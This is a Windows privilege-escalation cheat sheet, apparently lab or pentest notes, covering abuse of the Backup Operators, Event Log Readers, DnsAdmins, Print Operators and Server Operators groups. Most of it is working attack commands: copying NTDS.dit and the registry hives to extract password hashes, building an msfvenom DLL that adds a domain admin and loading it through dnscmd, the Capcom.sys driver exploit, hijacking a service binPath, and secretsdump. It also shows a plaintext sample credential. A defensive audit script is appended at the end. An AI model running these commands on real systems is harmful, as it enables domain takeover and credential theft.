# Windows Group Privileges

## Backup Operators

Membership in this group grants the SeBackupPrivilege and SeRestorePrivilege, which allow reading and writing any file on the system regardless of its ACL.

<https://github.com/giuliano108/SeBackupPrivilege>

#### 1 Import DLLs

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```

#### 2 Enable SeBackupPrivilege

```powershell
# Enable the privilege in the current process token
Set-SeBackupPrivilege

# Verify it is now enabled
Get-SeBackupPrivilege
```

#### 3 Copy File

```powershell
# Copies with the backup semantics flag, bypassing the file's ACL
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
```

#### Copy NTDS.dit

```powershell
# Interactive diskshadow session; NTDS.dit is locked while AD runs, so a
# shadow copy of C: is created and exposed as E: to read it from there
diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
```

#### Backup SAM + SYSTEM Hives

```powershell
# The SYSTEM hive holds the boot key needed to decrypt NTDS.dit / SAM secrets
reg save HKLM\SYSTEM SYSTEM.SAV

reg save HKLM\SAM SAM.SAV
```

#### Extract NTDS

```powershell
Import-Module .\DSInternals.psd1
# Boot key from the SYSTEM hive saved in the previous step
$key = Get-BootKey -SystemHivePath .\SYSTEM.SAV
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```

## Event Log Readers

### Check Group Membership

```powershell
net localgroup "Event Log Readers"
```

### Searching Security Logs

```powershell
# Local host, as the current user (looks for /user in logged command lines)
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# Remote host, with explicit credentials
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
```

## DnsAdmins

#### 1 Generating Malicious DLL

```bash
# Run on the attacking host
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

#### 2 Load DLL

```powershell
# Sets ServerLevelPluginDll under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
dnscmd.exe /config /serverlevelplugindll adduser.dll
```

#### 3 Restart Service

```powershell
# Use sc.exe explicitly: in PowerShell, sc is an alias for Set-Content
sc.exe stop dns
sc.exe start dns
```

## Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

<https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp>

### 1 Compile CPP File

```powershell
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
```

### 2 Add Capcom.sys

```powershell
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
```

### 3 Verify the Privilege Is Enabled

```powershell
EnableSeLoadDriverPrivilege.exe
```

### 4 Run Exploit

<https://github.com/tandasat/ExploitCapcom>

```powershell
.\ExploitCapcom.exe
```

## Server Operators

This group allows its members to administer Windows servers without being assigned Domain Admin privileges. It is a very highly privileged group whose members can log in locally to servers, including Domain Controllers.

### 1 Query Service

```powershell
# Check which account the service runs as (LocalSystem here)
sc.exe qc AppReadiness
```

### 2 Service Permissions Check

<https://learn.microsoft.com/en-us/sysinternals/downloads/psservice>

```powershell
c:\Tools\PsService.exe security AppReadiness
```

### 3 Modify Service Binary Path

```powershell
# The space after binPath= is required by sc.exe
sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
```

### 4 Start / Stop Service

```powershell
# Restarting the service runs the new binPath as LocalSystem
sc.exe stop AppReadiness
sc.exe start AppReadiness
```

### 5 Dump Hashes

```bash
# Impacket, run from the attacking host
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
```
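An added defender-side check for the groups and abuse points covered on this page (not part of the original notes). It assumes the ActiveDirectory RSAT module is installed and that it runs on a domain-joined host; the group names and registry path are the real ones the commands above touch.

```powershell
# Added audit script: lists members of the privileged groups discussed above and
# flags the two persistence points this page abuses (DNS plugin DLL, service binPath).
Import-Module ActiveDirectory

# Groups whose membership should be empty or tightly controlled
$watchedGroups = @('Backup Operators', 'Event Log Readers', 'DnsAdmins',
                   'Print Operators', 'Server Operators')

$findings = [System.Collections.Generic.List[object]]::new()

foreach ($g in $watchedGroups) {
    # -Recursive resolves nested groups, which an "empty looking" group may hide
    $members = Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        $findings.Add([pscustomobject]@{
            Check  = 'GroupMember'
            Object = $g
            Detail = "$($m.objectClass) $($m.SamAccountName)"
        })
    }
}

# DnsAdmins abuse: "dnscmd /config /serverlevelplugindll" writes this value.
# Run on each DNS server (locally here; wrap in Invoke-Command for remote hosts).
$dnsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$plugin = (Get-ItemProperty -Path $dnsKey -Name ServerLevelPluginDll `
           -ErrorAction SilentlyContinue).ServerLevelPluginDll
if ($plugin) {
    $findings.Add([pscustomobject]@{ Check = 'DnsPluginDll'; Object = $dnsKey; Detail = $plugin })
}

# Server Operators abuse: a LocalSystem service whose binPath was rewritten to a
# shell command. Flag LocalSystem services whose path does not reference an .exe.
$suspect = Get-CimInstance Win32_Service | Where-Object {
    $_.StartName -eq 'LocalSystem' -and $_.PathName -and $_.PathName -notmatch '\.exe'
}
foreach ($s in $suspect) {
    $findings.Add([pscustomobject]@{ Check = 'ServiceBinPath'; Object = $s.Name; Detail = $s.PathName })
}

$findings | Format-Table -AutoSize
```

Non-empty output is a review item, not proof of compromise: compare group members against a documented allow-list and service paths against the expected binaries.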
